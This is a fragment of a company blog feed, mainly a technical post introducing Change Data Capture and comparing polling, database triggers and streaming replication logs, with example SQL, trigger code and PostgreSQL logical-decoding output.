&lt;p&gt;&lt;em&gt;The SQL Server connector is currently in beta. We encourage customers to start using the connector in their staging and development environments and provide feedback. Following the beta phase, we will make the connector generally available for use in all environments (dev, staging, and production). Meroxa follows this pattern for all connectors that it releases to ensure a great experience for you.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;As always,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need help, reach out to &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Join our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; community.&lt;/li&gt;
&lt;li&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Stream Your Database Changes with Change Data Capture: Part One]]></title><description><![CDATA[Change Data Capture (CDC) is an efficient and scalable model that simplifies the implementation of real-time systems.]]></description><link>https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-one</link><guid isPermaLink="false">https://meroxa.com/blog/stream-your-database-changes-with-change-data-capture-part-one</guid><dc:creator><![CDATA[ Taron Foxworth]]></dc:creator><pubDate>Wed, 11 Aug 2021 20:18:00 GMT</pubDate><content:encoded>&lt;p&gt;Nobody wants to look at a dashboard or make decisions with yesterday’s data. We live in a world where real-time information is a first-class expectation for our users and is critical to make the best decisions inside an organization.&lt;/p&gt;
&lt;p&gt;Change Data Capture (CDC) is an efficient and scalable model that simplifies the implementation of real-time systems.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*O-S32djKgEuSCxO1vqayUA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Change Data Capture Diagram&lt;/p&gt;
&lt;p&gt;Industry-leading companies like &lt;a href=&quot;https://shopify.engineering/capturing-every-change-shopify-sharded-monolith&quot;&gt;Shopify&lt;/a&gt;, &lt;a href=&quot;https://www.capitalone.com/tech/software-engineering/batch-to-real-time-with-change-data-capture/&quot;&gt;Capital One&lt;/a&gt;, &lt;a href=&quot;https://netflixtechblog.com/dblog-a-generic-change-data-capture-framework-69351fb9099b&quot;&gt;Netflix&lt;/a&gt;, &lt;a href=&quot;https://medium.com/airbnb-engineering/capturing-data-evolution-in-a-service-oriented-architecture-72f7c643ee6f&quot;&gt;Airbnb&lt;/a&gt;, and &lt;a href=&quot;https://medium.com/zendesk-engineering/add-some-smarts-to-your-change-data-capture-2296032ad042&quot;&gt;Zendesk&lt;/a&gt; have all published technical articles demonstrating how they have implemented Change Data Capture (CDC) in their data architectures to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Expose data from a centralized system to event-driven microservices.&lt;/li&gt;
&lt;li&gt;Build applications that respond to data events in real-time.&lt;/li&gt;
&lt;li&gt;Maintain data quality and freshness within data warehouses and other downstream consumers of data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this multi-part series on Change Data Capture, we are going to dive into:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What is Change Data Capture, and how are CDC systems implemented?&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;/blog/stream-your-database-changes-with-change-data-capture-part-two&quot;&gt;What are the ideal CDC use cases, and how to get started with CDC?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s begin.&lt;/p&gt;
&lt;h3&gt;What is Change Data Capture (CDC)?&lt;/h3&gt;
&lt;p&gt;The idea of “tracking the changes to a system” isn’t new. Engineers have been writing scripts to query and update data in batches since the idea of programming itself came about. Change Data Capture is a formalization of the various methods that determine &lt;strong&gt;how changes are tracked&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;At its core, CDC is a process that allows an application to listen for changes to a data store and respond to those events. The process involves a data store (database, data warehouse, etc.) and a system to capture the changes of the data store.&lt;/p&gt;
&lt;p&gt;For example, one could:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Capture &lt;a href=&quot;https://www.postgresql.org/&quot;&gt;PostgreSQL&lt;/a&gt; (database) changes and send the change events to &lt;a href=&quot;https://kafka.apache.org/&quot;&gt;Kafka&lt;/a&gt; using &lt;a href=&quot;https://debezium.io/&quot;&gt;Debezium&lt;/a&gt; (CDC).&lt;/li&gt;
&lt;li&gt;Capture changes from &lt;a href=&quot;https://www.mysql.com/&quot;&gt;MySQL&lt;/a&gt; (database) and &lt;code class=&quot;language-text&quot;&gt;POST&lt;/code&gt; them to an HTTP endpoint with &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; (CDC).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Real-World Example&lt;/h3&gt;
&lt;p&gt;Let’s look at a real-world example that would benefit from CDC. Here, we have an example of a table in PostgreSQL:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*iTaK9Q0UbDKGYr4gP0UcVw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Example User Data&lt;/p&gt;
&lt;p&gt;When information in the &lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table changes, the business may need to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Update the data warehouse, which is the source of truth for business analytics.&lt;/li&gt;
&lt;li&gt;Notify the team of a new user.&lt;/li&gt;
&lt;li&gt;Keep an additional &lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table in sync with filtered columns for privacy purposes.&lt;/li&gt;
&lt;li&gt;Create a real-time dashboard of new user activity.&lt;/li&gt;
&lt;li&gt;Capture change events for audit logging.&lt;/li&gt;
&lt;li&gt;Store every change in a cloud bucket for historical analytics.&lt;/li&gt;
&lt;li&gt;Update an index used for search.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can build services to perform all of the actions above by acting on a data change event, and if desired, build and manage them independently of each other.&lt;/p&gt;
&lt;p&gt;CDC gives us efficiency by acting on events as they occur and scalability by leveraging a &lt;a href=&quot;https://engineering.linkedin.com/distributed-systems/log-what-every-software-engineer-should-know-about-real-time-datas-unifying&quot;&gt;decoupled event-driven architecture&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;A CDC Event Example&lt;/h3&gt;
&lt;p&gt;CDC systems will usually emit an event that contains details about the change that occurred. For example, when a new user is created and captured by a CDC system like Debezium, the generated event looks like this:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*ExWEPx4LY3Pjfi6fEUsUYA.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Anatomy of CDC Event&lt;/p&gt;
&lt;p&gt;This event describes the schema of the data (&lt;code class=&quot;language-text&quot;&gt;schema&lt;/code&gt;), the operation that occurred (&lt;code class=&quot;language-text&quot;&gt;op&lt;/code&gt;), and the data before and after the change (&lt;code class=&quot;language-text&quot;&gt;payload&lt;/code&gt;).&lt;/p&gt;
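&lt;p&gt;In code, unpacking such an event is straightforward. Here is a minimal sketch in Python; the envelope below is a simplified, hypothetical Debezium-style event, not the full format:&lt;/p&gt;

```python
# Minimal sketch: unpack a simplified, hypothetical Debezium-style change event.

def describe_change(event):
    """Return a summary of a CDC change event: operation plus before/after row state."""
    payload = event["payload"]
    op = payload["op"]  # "c" = create, "u" = update, "d" = delete
    ops = {"c": "INSERT", "u": "UPDATE", "d": "DELETE"}
    return {
        "operation": ops.get(op, op),
        "before": payload["before"],  # row state before the change (None on insert)
        "after": payload["after"],    # row state after the change (None on delete)
    }

# An illustrative "new user created" event.
event = {
    "schema": {"fields": [{"field": "id", "type": "int32"}]},
    "payload": {
        "op": "c",
        "before": None,
        "after": {"id": 42, "name": "Ada"},
    },
}

summary = describe_change(event)
print(summary["operation"], summary["after"])  # INSERT {'id': 42, 'name': 'Ada'}
```
&lt;p&gt;A downstream service would dispatch on the operation: for example, upserting into a warehouse on inserts and updates, and tombstoning on deletes.&lt;/p&gt;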
&lt;p&gt;The event’s format, the fidelity of information, and when it is delivered depend on the CDC system’s implementation.&lt;/p&gt;
&lt;h3&gt;CDC Implementations&lt;/h3&gt;
&lt;p&gt;Tracking changes to a PostgreSQL database could look very similar to, or wildly different from, tracking changes within MongoDB. It all depends on the environment and the capture method chosen.&lt;/p&gt;
&lt;p&gt;The capture method chosen can define:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Which operations (insert, update, delete) can be captured.&lt;/li&gt;
&lt;li&gt;How the event is formatted.&lt;/li&gt;
&lt;li&gt;Whether the CDC system is &lt;em&gt;pulling&lt;/em&gt; the change events or having them &lt;em&gt;pushed&lt;/em&gt; to it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s look at each of the different methods and discuss some of the pros and cons of each.&lt;/p&gt;
&lt;h3&gt;Polling&lt;/h3&gt;
&lt;p&gt;When implementing any database connector, the decision starts with “&lt;a href=&quot;https://cnr.sh/essays/build-kafka-connector-source&quot;&gt;To poll or not to poll&lt;/a&gt;.” Polling is the most conceptually simple CDC method. To implement polling, you need to query the datastore on an interval.&lt;/p&gt;
&lt;p&gt;For example, you may run the following query on an interval:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; Users&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This &lt;code class=&quot;language-text&quot;&gt;SELECT *&lt;/code&gt; query would be considered the &lt;strong&gt;bulk&lt;/strong&gt; (&quot;give me everything&quot;) polling method. While this is great for capturing a snapshot of the current state, downstream consumers would need extra work to figure out exactly what data changed in each interval.&lt;/p&gt;
&lt;p&gt;However, polling can get much more granular. For example, it’s possible to poll only for a primary key:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;MAX&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; Users&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A system can track the max value of a primary key (&lt;code class=&quot;language-text&quot;&gt;id&lt;/code&gt;). When the max value increments, this means that an &lt;code class=&quot;language-text&quot;&gt;INSERT&lt;/code&gt; operation occurred.&lt;/p&gt;
&lt;p&gt;Additionally, if a table has an &lt;code class=&quot;language-text&quot;&gt;updated_at&lt;/code&gt; column, a query can look at timestamp changes to capture &lt;code class=&quot;language-text&quot;&gt;UPDATE&lt;/code&gt; operations:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; Users &lt;span class=&quot;token keyword&quot;&gt;WHERE&lt;/span&gt; updated_at &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;2021-02-08&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
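&lt;p&gt;Putting the pieces together, the max-id polling method can be sketched end-to-end with Python’s built-in sqlite3 module as a toy stand-in for a real database (table and column names are illustrative):&lt;/p&gt;

```python
# Toy sketch of max-id polling, using sqlite3 as a stand-in for a real database.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO Users (name) VALUES ('ada')")
conn.commit()

def poll_new_rows(conn, last_seen_id):
    """One polling pass: fetch rows inserted since the last seen primary key."""
    rows = conn.execute(
        "SELECT id, name FROM Users WHERE id > ? ORDER BY id", (last_seen_id,)
    ).fetchall()
    new_max = rows[-1][0] if rows else last_seen_id
    return rows, new_max

# The first pass captures a snapshot; later passes only see new inserts.
rows, last_id = poll_new_rows(conn, 0)
conn.execute("INSERT INTO Users (name) VALUES ('grace')")
conn.commit()
new_rows, last_id = poll_new_rows(conn, last_id)
print(new_rows)  # [(2, 'grace')] -- only the row inserted between polls
```
&lt;p&gt;A real implementation would run the polling pass on a timer and persist the last seen id between runs.&lt;/p&gt;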
&lt;p&gt;&lt;strong&gt;Pros and Cons&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Easy:&lt;/strong&gt; Polling is great because it’s simple to implement and deploy, and it’s very effective.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Custom queries are useful&lt;/strong&gt;: One advantage is that the query used while polling can be customized to fit complex use cases. The query could include &lt;code class=&quot;language-text&quot;&gt;JOIN&lt;/code&gt;s or transformations performed directly in SQL.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Capturing deletes is hard:&lt;/strong&gt; With the polling method, it’s much harder to capture &lt;code class=&quot;language-text&quot;&gt;DELETE&lt;/code&gt; operations. You can&apos;t really query a row in a database if it&apos;s gone entirely. One solution is to use &lt;a href=&quot;https://dev.to/anaptfox/creating-a-soft-delete-archive-table-with-postgresql-38pi&quot;&gt;database triggers to create an &quot;archive&quot; table of deleted records&lt;/a&gt;. Then, delete operations become insert operations on a new table that can be polled.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Events are pulled, not pushed&lt;/strong&gt;: With polling, the event is pulled from the upstream system. For example, when using polling to ingest into a data warehouse, the ingestion would happen when the CDC system decides to poll. In theory, “real-time” can be accomplished with fast enough polling, but this could cause performance overhead to the database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Performance overhead is a concern&lt;/strong&gt;: A &lt;code class=&quot;language-text&quot;&gt;SELECT *&lt;/code&gt; or any complex query doesn&apos;t scale very well on massive datasets. One common workaround is to poll a standby instance instead of the primary database.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Changes between query times can’t be captured&lt;/strong&gt;: Another consideration is the data changes between query times. For example, if a system polls every hour and the data changes multiple times within that same hour, you’d only be able to see the change at query times, not any of the intermediate changes.&lt;/p&gt;
&lt;h3&gt;Database Triggers&lt;/h3&gt;
&lt;p&gt;Most of the popular databases support triggers of some sort. For example,&lt;a href=&quot;https://www.postgresql.org/docs/9.1/sql-createtrigger.html&quot;&gt;in PostgreSQL&lt;/a&gt;, one can build a trigger that will move a row to a new table when it’s deleted:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TRIGGER&lt;/span&gt; moveDeleted
&lt;span class=&quot;token keyword&quot;&gt;BEFORE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DELETE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;FOR&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;EACH&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ROW&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;EXECUTE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;PROCEDURE&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;moveDeleted&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Because triggers can effectively listen to an operation and perform an action, database triggers can act as a CDC system.&lt;/p&gt;
&lt;p&gt;In some cases, these triggers can be very complex, full-blown functions. For example, &lt;a href=&quot;https://docs.mongodb.com/realm/triggers/&quot;&gt;in MongoDB&lt;/a&gt;, triggers are written in JavaScript:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token function-variable function&quot;&gt;exports&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;changeEvent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Destructure out fields from the change stream event object&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; updateDescription&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; fullDocument &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; changeEvent&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Check if the shippingLocation field was updated&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; updatedFields &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Object&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;keys&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;updateDescription&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;updatedFields&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; isNewLocation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; updatedFields&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;some&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;field&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt;
  	field&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;match&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token regex&quot;&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token regex-source language-regex&quot;&gt;shippingLocation&lt;/span&gt;&lt;span class=&quot;token regex-delimiter&quot;&gt;/&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// If the location changed, text the customer the updated location.&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;isNewLocation&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// Do something&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
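&lt;p&gt;The delete-archive idea from the PostgreSQL example above can be tried end-to-end in SQLite, whose trigger syntax is similar. This is a toy sketch; the table names are illustrative:&lt;/p&gt;

```python
# Toy sketch: a delete-archive trigger in SQLite (syntax similar to PostgreSQL's).
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE User (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE DeletedUser (id INTEGER, name TEXT);
-- Move each deleted row into an archive table at the moment it is deleted.
CREATE TRIGGER moveDeleted
BEFORE DELETE ON User
FOR EACH ROW
BEGIN
    INSERT INTO DeletedUser (id, name) VALUES (OLD.id, OLD.name);
END;
""")
conn.execute("INSERT INTO User (name) VALUES ('ada')")
conn.execute("DELETE FROM User WHERE name = 'ada'")
conn.commit()

archived = conn.execute("SELECT id, name FROM DeletedUser").fetchall()
print(archived)  # [(1, 'ada')] -- the deleted row, now pollable as an insert
```
&lt;p&gt;The archive table turns deletes into inserts, which the polling method from earlier can then pick up.&lt;/p&gt;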
&lt;p&gt;&lt;strong&gt;Pros and Cons&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ease of deployment&lt;/strong&gt;: Triggers are awesome because they are supported out of the box by most databases and are easy to implement.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data Consistency:&lt;/strong&gt; Current and future downstream consumers don’t have to reimplement this logic because it lives in the database rather than in each application, which is especially valuable in a microservice architecture.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Application logic in databases could be bad&lt;/strong&gt;: However, databases should not contain &lt;em&gt;too&lt;/em&gt; much application logic. This could result in behavior being too tightly coupled to the database, and one bad trigger could affect an entire data infrastructure. Triggers should be concise and simple.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Every operation is captured&lt;/strong&gt;: You can build a trigger for each database operation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Performance overhead is a concern:&lt;/strong&gt; Poorly written triggers can also impact database performance for the same reasons as the polling method. A trigger containing a complex query won’t scale well on massive datasets.&lt;/p&gt;
&lt;h3&gt;Streaming Replication Logs&lt;/h3&gt;
&lt;p&gt;It’s best to have at least a secondary instance of a database running to ensure proper failover and disaster recovery.&lt;/p&gt;
&lt;p&gt;In this model, the standby instances of the database need to stay up-to-date with the primary in real time &lt;em&gt;and&lt;/em&gt; not lose information. The best way to do this today is for the database to write every change to a log. Then, any standby instance can stream the changes from this log and apply the operations locally. Performing the same operations in real time is what allows the standby instances to “mirror” the primary.&lt;/p&gt;
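The replay mechanism described above can be sketched in miniature. The Python below is a toy model, with change records as plain tuples rather than binary log entries, showing how a standby that applies the same ordered log ends up mirroring the primary:

```python
# Minimal model of log-based replication: the primary appends every
# change to an ordered log; a standby replays that log to mirror state.
def apply(state, record):
    """Apply a single log record (op, key, value) to a key-value state."""
    op, key, value = record
    if op in ("INSERT", "UPDATE"):
        state[key] = value
    elif op == "DELETE":
        state.pop(key, None)
    return state

# The primary's write-ahead log: an ordered list of change records.
log = [
    ("INSERT", 1, {"email": "a@example.com"}),
    ("INSERT", 2, {"email": "b@example.com"}),
    ("UPDATE", 1, {"email": "a-new@example.com"}),
    ("DELETE", 2, None),
]

# A standby (or a CDC consumer) starts empty and replays the log in order.
standby = {}
for record in log:
    apply(standby, record)

print(standby)
```

The same loop is all a CDC consumer needs: instead of applying each record to local state, it forwards the record downstream.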
&lt;p&gt;Here are some references on how this works for some of the most popular databases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.postgresql.org/docs/9.0/wal-intro.html&quot;&gt;PostgreSQL’s Write-Ahead Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dev.mysql.com/doc/refman/8.0/en/binary-log.html&quot;&gt;MySQL’s Binary Log&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.mongodb.com/manual/core/replica-set-oplog/&quot;&gt;MongoDB’s Oplog&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CDC can use the same mechanism to listen to changes. Just like a standby database, an additional system can also process the streaming log as it’s updated:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1400/1*uYynjkjIRECH8S5laORpbw.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the PostgreSQL example diagram above, a CDC system can act as an additional &lt;a href=&quot;https://www.postgresql.org/docs/9.6/runtime-config-replication.html&quot;&gt;WAL Receiver&lt;/a&gt;, process each event, and send it to a message transport (HTTP API, Kafka, etc.).&lt;/p&gt;
&lt;p&gt;Here is an example of querying changes from PostgreSQL’s WAL using a SQL function provided by the &lt;a href=&quot;https://www.postgresql.org/docs/10/logicaldecoding-example.html&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;test_decoding&lt;/code&gt; plugin&lt;/a&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;postgres=# SELECT * FROM pg_logical_slot_get_changes(&apos;regression_slot&apos;, NULL, NULL); 
lsn | xid | data 
-----------+-------+--------------------------------------------------------- 
0/BA5A688 | 10298 | BEGIN 10298 
0/BA5A6F0 | 10298 | table public.data: INSERT: id[integer]:1 data[text]:&apos;1&apos; 
0/BA5A7F8 | 10298 | table public.data: INSERT: id[integer]:2 data[text]:&apos;2&apos; 
0/BA5A8A8 | 10298 | COMMIT 10298 
(4 rows)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The columns in the query response above describe the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;lsn&lt;/code&gt; - Log Sequence Number (LSN) - The position of this change in the WAL. Downstream systems use it to track how far into the log they have read.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;xid&lt;/code&gt; - Transaction ID - Each PostgreSQL transaction gets a unique ID.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;data&lt;/code&gt; - A description of the operation that occurred and the affected row.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The format of these change events is determined by the &lt;a href=&quot;https://wiki.postgresql.org/wiki/Logical_Decoding_Plugins&quot;&gt;Logical Decoding Output Plugin&lt;/a&gt;. For example, the &lt;a href=&quot;https://github.com/eulerto/wal2json&quot;&gt;wal2json&lt;/a&gt; output plugin emits the changes as JSON, which is easier to parse than the &lt;code class=&quot;language-text&quot;&gt;test_decoding&lt;/code&gt; plugin output.&lt;/p&gt;
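As a rough illustration of why JSON output is easier to consume, here is how a wal2json-style payload could be parsed in Python. The record below is made up for this example; check the wal2json documentation for the exact schema of the version you run:

```python
import json

# An illustrative wal2json-style payload (format version 1). Field names
# follow the plugin's documented output, but this exact record is hypothetical.
payload = """
{"change": [
  {"kind": "insert", "schema": "public", "table": "data",
   "columnnames": ["id", "data"], "columnvalues": [1, "1"]},
  {"kind": "insert", "schema": "public", "table": "data",
   "columnnames": ["id", "data"], "columnvalues": [2, "2"]}
]}
"""

events = []
for change in json.loads(payload)["change"]:
    # Zip column names and values into a row dict -- no text parsing needed,
    # unlike the tabular test_decoding output shown earlier.
    row = dict(zip(change["columnnames"], change["columnvalues"]))
    events.append((change["kind"], change["table"], row))

print(events)
```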
&lt;p&gt;PostgreSQL also provides a mechanism to &lt;a href=&quot;https://www.postgresql.org/docs/10/logicaldecoding-walsender.html&quot;&gt;stream these changes&lt;/a&gt; as they occur. As you saw in the event example earlier, Debezium also parses the streaming log in real time and produces a JSON event.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pros and Cons&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Events are pushed&lt;/strong&gt;: One huge benefit of streaming logs is that events are pushed to the CDC system as changes occur (vs. polling). This push model allows for real-time architectures. Using the &lt;code class=&quot;language-text&quot;&gt;User&lt;/code&gt; table as an example, the data warehouse ingestion would happen in real time with a streaming log CDC system.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Efficient and Low Latency&lt;/strong&gt;: Standby instances use streaming logs for disaster recovery, where efficiency and low latency are top priorities. Streaming replication logs is the most efficient means of capturing changes with the least overhead to the database. This process looks different from database to database, but the concepts still hold.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Every operation is captured&lt;/strong&gt;: Every transaction occurring to the data store will be written to the log.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hard to get a complete snapshot of data&lt;/strong&gt;: Generally, after a certain amount of time (or size), the streaming logs get purged because they take up space. As a result, the logs may not contain &lt;em&gt;every&lt;/em&gt; change that ever occurred, just the most recent ones.&lt;/p&gt;
